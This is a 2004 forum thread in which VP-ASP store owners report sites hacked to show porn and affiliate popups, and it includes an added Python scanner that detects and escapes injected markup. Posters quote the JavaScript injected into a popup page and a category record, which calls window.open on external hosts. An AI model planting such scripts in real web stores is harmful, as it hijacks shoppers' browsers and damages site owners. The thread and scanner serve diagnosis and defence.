maduko
VP-CART New User
52 Posts
Posted - March 07 2004 : 20:53:49
Shop pages are opening a popup window. When closed it opens a spam page from freesextogo.com. Has anyone else experienced this?
The source of the popup follows...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Untitled</title> </head> <script language="JavaScript"> function ourl1() { window.open("http://www.freesextogo.com", "_blank"); } </script> <body> <body onunload="javascript:ourl1()"> </body> </html>
support
Administrator
4679 Posts
Posted - March 07 2004 : 21:04:10
Your site has probably been hacked. Take a look in your product and category records to see if a javascript has been put into one of your product descriptions.
Please check our security notices and fixes www.vpasp.com/virtprog/info/faq_security.htm
VP-ASP Support
maduko
VP-CART New User
52 Posts
Posted - March 07 2004 : 21:10:41
I get this popup on any page that loads the shop&db and shopfileio includes. You think I should start looking in the products and categories?
I will review the security notice again - I have tried to stay up on all of those.
maduko
VP-CART New User
52 Posts
Posted - March 07 2004 : 21:14:25
You were right. The Publications category had been worked over with this addition...
<br> <br> <SCRIPT LANGUAGE=JavaScript> window.open("http://69.47.51.171/links/aff/aff.php", "_blank","toolbar=no, scrollbars=no, menubar=no, width=1, height=1, left=1, top=1"); </SCRIPT> <br>
Thanks for your help.
tonyhrx
Starting Member
United Kingdom
3 Posts
Posted - March 09 2004 : 04:27:50
OK I got hacked this morning with this pop up. Hackers had changed shoppageheader.asp and had also managed to alter a category item in the shopping400.mdb file so that the pop-up remained.
Tony Horrocks
tonyhrx
Starting Member
United Kingdom
3 Posts
Posted - March 09 2004 : 05:12:07
What's worrying is that we have firewalls up and follow VPASP security advice, yet someone is still able to do this sort of stuff. Anyone any ideas?
Tony Horrocks
devshb
Senior Member
United Kingdom
1904 Posts
Posted - March 09 2004 : 07:11:13
I could be wrong, but...
If the hacker actually managed to change the ASP code itself (as opposed to just getting into the database), then it looks like it's your server/directories that are vulnerable, not just VP-ASP stuff.
It looks like the hacker managed to get direct access to your site with something like FTP.
Obviously I don't know anything about your server, but if you've got something like an admin user in the database with the same id/pwd as the server/FTP connection details, then someone might have used that.
Or, it could be an inside job.
Whatever it is, I agree it's pretty scary.
There is something else which might be worth mentioning here, which is that if you upload all your default VP-ASP stuff to a publicly available domain, and then do the security measures afterwards, you'd leave yourself vulnerable in between the initial posting and the security update, during which time someone might have been able to grab/do what they needed so that they could then go back again later on, even if the security measures are in place. It's just a personal view, but because of this potential vulnerability time, I'd always implement the standard VP-ASP-advised security measures, and then after that'd been done, I'd do some of those things again (changing the admin login page again, changing ALL the admin ids/pwds again), and I wouldn't put anything into the database until that'd been done. Then, I'd check the database contents are blank/default and that no spurious files are on the server.
Edited by - devshb on March 09 2004 07:20:43
sfarling
Starting Member
3 Posts
Posted - March 09 2004 : 09:02:49
Got me too. Scott
siraj
VP-CART New User
USA
194 Posts
Posted - March 09 2004 : 14:35:53
I think in maduko's case, they did not get into the server but only the database and the admin pages. Once you get control of the admin page, they have put the above HTML/JS script in the category table. So when ASP tries to get the category field populated into the ASP page, then we see the result. I don't believe that they have got control of the server. GOOD LUCK. SJ.
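The two checks the thread converges on (look through the product and category records for injected markup, and stop whatever is stored there from running when the ASP page renders it) can be scripted. The block below is an added example in Python and is not code from VP-ASP or from anyone in this thread: it assumes the table has been exported to a list of dicts (the field names `categoryid` and `catdescription` and the sample rows are constructed, and the URL is a documentation address, not an indicator from the thread). It flags the kinds of markup seen above (script tags, `javascript:` URLs, inline event handlers such as `onunload`) and shows the output-encoding step that neutralises them.

```python
import html
import re

# Markup that has no business being inside a store's category or product text.
# Patterns are case-insensitive and tolerate stray whitespace ("< script", "onUnload =").
SUSPICIOUS_PATTERNS = {
    "script tag": re.compile(r"<\s*script\b", re.I),
    "javascript: url": re.compile(r"javascript\s*:", re.I),
    "inline event handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "embedded frame/object": re.compile(r"<\s*(iframe|object|embed)\b", re.I),
}

# Constructed sample rows standing in for an export of the categories table.
# Field names are assumptions about the schema; row 2 mimics the shape of the
# injected category text quoted in the thread, rows 4 and 5 are benign look-alikes.
SAMPLE_CATEGORIES = [
    {"categoryid": 1, "catdescription": "Publications"},
    {"categoryid": 2, "catdescription": (
        "Audio<br> <br> <SCRIPT LANGUAGE=JavaScript> "
        'window.open("http://203.0.113.5/aff.php", "_blank", "width=1, height=1"); '
        "</SCRIPT> <br>")},
    {"categoryid": 3, "catdescription": 'Gifts <a href="javascript:ourl1()">Sale</a>'},
    {"categoryid": 4, "catdescription": "Books on sale = 20% off"},
    {"categoryid": 5, "catdescription": "Coupon=SPRING"},
]


def scan_rows(table_name, rows, id_field):
    """Return one finding per (row, field, indicator) where injected markup is present."""
    findings = []
    for row in rows:
        for field, value in row.items():
            if not isinstance(value, str):
                continue
            for label, pattern in SUSPICIOUS_PATTERNS.items():
                match = pattern.search(value)
                if match:
                    start = max(0, match.start() - 20)
                    findings.append({
                        "table": table_name,
                        "id": row.get(id_field),
                        "field": field,
                        "indicator": label,
                        "snippet": value[start:match.end() + 40],
                    })
    return findings


def escape_for_output(value):
    """Encode a stored string so the browser renders it as text rather than markup."""
    return html.escape(value, quote=True)


def escaped_copy(row):
    """A copy of a row with every string field HTML-encoded (what the page template should emit)."""
    return {k: escape_for_output(v) if isinstance(v, str) else v for k, v in row.items()}


if __name__ == "__main__":
    for f in scan_rows("categories", SAMPLE_CATEGORIES, "categoryid"):
        print(f"{f['table']} id={f['id']} field={f['field']}: {f['indicator']} -> {f['snippet']!r}")
```

Run it against an export of every table whose text fields reach a page (products and categories at least); each finding names the row and field to clean. The scanner errs on the side of noise (a description containing the word "onion=" would be flagged), which is the right trade-off for a one-off cleanup. Encoding at output time is what stops a re-injected record from executing while the admin credentials are being rotated; if the store deliberately stores HTML in descriptions, encoding everything will break that formatting, and an allowlist of permitted tags is needed instead.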
devshb
Senior Member
United Kingdom
1904 Posts
Posted - March 09 2004 : 15:05:47
I agree; I may have caused undue alarm there; I was only talking about tonyhrx's posting (the "Hackers had changed shoppageheader.asp" bit). If the javascript had been added to the category, then I guess it would give the appearance of changing shoppageheader.asp, but it wouldn't have actually caused a physical change to the file.
but if shoppageheader.asp had physically been changed, then there would be a larger more serious problem.
Edited by - devshb on March 09 2004 15:08:50
siraj
VP-CART New User
USA
194 Posts
Posted - March 09 2004 : 22:22:50
I agree with devshb. What is scary is tonyhrx's case: he got a firewall set up and still the hackers managed to get in? Something really missing! There are a couple of possibilities, like devshb said: hackers might have downloaded the db and, by coincidence, if you are using the same admin/pass for the server then forget it!!! But again, with a firewall set up, how can hackers change the shopage_header? Simply I did not get it. Is there any better explanation? Second chance is, your directory permissions might have been set up incorrectly so hackers can do whatever they want! GOOD LUCK. SJ.
dfreeman
Starting Member
USA
6 Posts
Posted - March 29 2004 : 09:28:22
The freesextogo.com link was just sent last night to all of the shoppers in one of my online stores using vpasp. The database is SQL and to my knowledge we have implemented all of the recommended security fixes. The email came from the email address used by the shopping cart and the subject line was 'Shopping Order'.
Not so good, since this site is a Christian ministry and now its shoppers all got an email link to a porn site, seemingly from the ministry.
David Freeman